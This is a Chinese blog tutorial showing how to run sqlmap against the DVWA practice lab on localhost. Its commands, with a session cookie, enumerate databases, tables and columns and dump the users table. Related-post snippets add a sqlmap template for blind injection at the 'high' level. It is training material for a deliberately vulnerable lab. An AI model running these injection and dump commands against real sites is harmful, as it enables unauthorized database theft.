dvwa之sql injection之sqlmap工具注入(low版)

最新推荐文章于 2024-12-12 08:57:08 发布
原创 最新推荐文章于 2024-12-12 08:57:08 发布 · 1.9k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#dvwa #sql

本文详细介绍如何使用SQLMap工具进行SQL注入攻击,包括设置安全性级别、使用Cookie维持会话、发现数据库及表信息,并最终获取敏感数据。

可能要用到的参数:

-u             指定URL

--cookie     带cookie注入


爆库:

--dbs     发现所有数据库 (参数前有空格)

列出数据库:

--tables     列出数据库表  (参数前有空格)

-D            选择数据库


首先一定先把难度调为low


当写1-5的时候,都会有值出来


直接上工具


如下:Sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id =1&submit=sublit#"


有一个302跳转,跳转到的是登录页面,所以这个时候需要使用cookie进行会话维持,然后使用burpsuite或者是f12都行,找到cookie:


security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5

构造语句:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"

得到的值:



然后进行爆数据库处理:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" --dbs

得到的结果如下:


看到了我们想要的

列出数据库表:

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" --tables -D dvwa

   -D选项是选择数据库为dvwa

然后 


列出users表的所有字段


–columns -T “users”<列出mysql数据库中的user表的所有字段> (columns参数前带空格)

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"  --columns -T users    //两个--

然后就是使用字典(自带)进行解密

-T users --dump

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"  -T users --dump


中间是y 1 n 回车


结果就出来啦





sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
DVWA-SQL注入sqlmap安装和使用)
weixin_53256941的博客
07-12 1093
一.Python环境安装 链接: https://pan.baidu.com/s/1ZbR6LoKcSvqnF82UZvkesg?pwd=e79b 提取码: e79b 双击安装包进行安装配置环境变量 我的电脑,找到属性点击高级系统设置 出现"系统属性",点击环境变量 在下面的"系统变量"里面找到Path变量点击编辑,(没有的话点击新建)在变量值末尾,填上python安装路径 win+R+cmd打开命令窗口输入python出现此页面表示安装成功 二.Sqlmap安装 链接:https://pan.baidu.
Sqlmap
mumuzi2的博客
02-25 443
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
[DVWA靶场实战]-SQL注入攻击(命令注入+SQL回显注入+sqlmap工具实现自动化注入)详细教程
weixin_60838266的博客
07-24 3576
利用Kali Linux和burpsuite对DVWA靶场的Command Injection模块和SQL Injection模块进行sql注入攻击详细教程,包括使用工具sqlmap进行自动化注入攻击。
DVWA——SQL注入——sqlmap实现
weixin_46709219的博客
11-14 1688
网络安全-sqlmap学习笔记 sqlmap上面的总连接
【渗透测试】 sqlmap工具注入-基于dvwasql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1365
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
【渗透测试】|sqlmap工具注入-基于dvwasql injection
yangdan_jiayou的博客
03-27 1528
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
DVWA-SQL Injection 注入&Sqlmap
原味瓜子、的博客
09-22 541
文章目录SQL注入一、Low等级二、Medium等级三、High等级四、Impossible SQL注入 指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 一、Low等级 1、漏洞分析 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT
DVWA+SQL Injection(high)+SQLmap注入实战
Idoit_z的博客
04-07 1681
测试需求分析 1. 手工检测发现存在注入漏洞 High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止常规的SQLMap扫描注入测试,因为SQLMap注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入;但是并不代表High级别不能用SQLMap进行注入测试,此时需要利用其非常规的命令联合操作,如:–second-orde...
使用sqlmap完成sql注入DVWA
dongf2019的博客
12-12 1662
------------------------------------------------------------------------------------------------------运行结果。4、在kali中启动firefox浏览器,设置代理为127.0.0.1,端口为8080,访问dvwasql injection页面,输入1,submit。显示出users表格所以数据,其中用户密码已经从MD5还原为明文。2、启动dvwa,启动后地址为192.168.88.128。
DVWASQL注入漏洞与SQLmap
leaf_lucky的博客
01-24 1112
对于以上两个语句,1=1会正常输出,而1=2 错误输出,可以说明SQL语句生效,SQL语句存在漏洞。用户输入SQL语句,执行了MySQL内置函数user(),database()而对于以下语句,可以发现没有语句,SQL语句变化,1!= 2,不能得到输出。输入上面的语句有正常输出,对于“#”的作用是注释后续SQL语句。点击第一个,找到cookie,复制下来,即是以下语句。上面语句为原本的SQL语句,下面语句为过滤后的语句。对于上面三句语句,依次进行判断,可以得到。输入1' order by 1#得到。
sql注入low),dvwa环境(小白级别)
weixin_45971397的博客
07-10 481
sql注入low),dvwa环境 本文章是我自己学习时的一点笔记(刚学一个月),如果解释有错误请指出。 1.我们先选择级别为low,点击Submit 然后点击SQL Injection 开始我们的实验 2.在文本框当中输入1,我们可以看到在url当中出现id=1的字样。 sql注入有数字型,字符型,搜索型,布尔型(后两种完全不懂) 因为url中是id所以我们暂时当作是数字型 接下来我们在url和文本框中修改都是可以的。(只是在url要转换编码,我不熟暂时不讲,容易丢人) 2.然后我们试一下and or
使用SQLmapdvwa进行SQL注入测试
yusakul的博客
11-19 3455
SQLmap工具github链接:https://github.com/sqlmapproject/sqlmap 搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwaSQL Injection,打开浏览器调试,输入user id并submit...
DVWA SQL Injection Medium
Ramona的博客
11-27 555
Mdeium 基本的步骤及知识点在上节已经提到过这里不再赘述:https://blog.youkuaiyun.com/WQ_BCJ/article/details/84554777 1)与low级别不同,本次采用的是下拉按钮的方式,限制了用户的输入,通过url可以发现并没有?id=.....类似的参数所以不是get方法,那么我们可以通过火狐的hackbar提交post数据试一试: 2)通过以上页...
dvwa SQl注入中级、高级(使用sqlmap渗透)
m0_72904009的博客
06-09 1703
dvwa SQl注入中级、高级(使用sqlmap渗透)
sqlmap测试dvwa-sql注入high
qq_39511050的博客
08-12 2189
sqlmap测试dvwa-sql注入high
sqlmap快速上手教程
weixin_34138377的博客
10-31 365
为什么80%的码农都做不了架构师?>>> ...
DVWALOW级别SQL注入---SQLMap使用
weixin_42465260的博客
08-05 7952
看到这篇文章,相信大家对于DVWA的搭建已经没问题了吧,在这里就不在赘述DVWA的搭建过程。 SQLMapdvwa简单使用实例: 一、首先肯定是要判断是否有注入漏洞,在输入框输入1,返回 ID: 1 First name: admin Surname: admin 返回正常; 再次输入1',报错,返回 You have an error in your SQL syntax...
dvwasql注入盲注high使用sqlmap
最新发布
06-27
DVWA靶场中,High难度级别的SQL注入(Blind SQL Injection)通常会引入一些额外的安全机制,如请求跳转、二次参数提交等。这使得传统的直接注入方法难以奏效,因此需要结合sqlmap的高级功能进行测试。 ### 测试环境准备 在开始使用sqlmap之前,需要确保已经完成以下步骤: - 登录DVWA并设置安全级别为**High**。 - 使用工具(如Burp Suite)捕获目标请求的数据包,并保存到本地文件中。 - 在数据包中的注入点(例如`id=1`)后添加通配符`*`,以便sqlmap识别注入位置[^3]。 ### sqlmap命令详解 针对High难度的Blind SQL注入,可以使用以下sqlmap命令: ```bash sqlmap -r "/path/to/request.txt" \ --second-url="http://<dvwa-ip>/dvwa/vulnerabilities/sqli_blind/" \ --cookie="PHPSESSID=<session-id>; security=high" \ --batch --dump -D "dvwa" -T "<table-name>" -C "<column-name>" ``` #### 参数说明: - `-r`:指定从本地文件读取HTTP请求数据包。 - `--second-url`:指定注入后跳转的目标URL,适用于需要二次请求的场景。 - `--cookie`:提供有效的会话信息以保持登录状态。 - `--batch`:启用批处理模式,避免交互式提示。 - `--dump`:导出指定表的数据。 - `-D`:指定数据库名称(如`dvwa`)。 - `-T`:指定目标数据表(如`users`或`locations`)。 - `-C`:指定需要枚举的字段列名(如`name`或`user`)。 ### 实际操作流程 1. **抓包与修改请求** 使用Burp Suite拦截向`vulnerabilities/sqli_blind/`发送的GET或POST请求,将原始请求保存到文件中,并在`id`参数后添加`*`标记注入点[^3]。 2. **运行sqlmap命令** 执行上述命令时,确保路径和参数正确无误。例如,若目标表为`users`且需获取`user`和`password`字段,则可调整`-T`和`-C`参数。 3. **结果分析** sqlmap会在控制台输出检测到的注入类型(如布尔盲注或时间盲注)、数据库本、用户权限及目标表数据[^1]。 ### 注意事项 - 高级别防护可能会限制请求频率,建议适当增加延时(使用`--delay`参数)以避免触发WAF。 - 若目标页面存在重定向逻辑,务必准确配置`--second-url`参数[^2]。 - 确保`PHPSESSID`和`security` Cookie值有效,否则可能导致身份验证失败。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值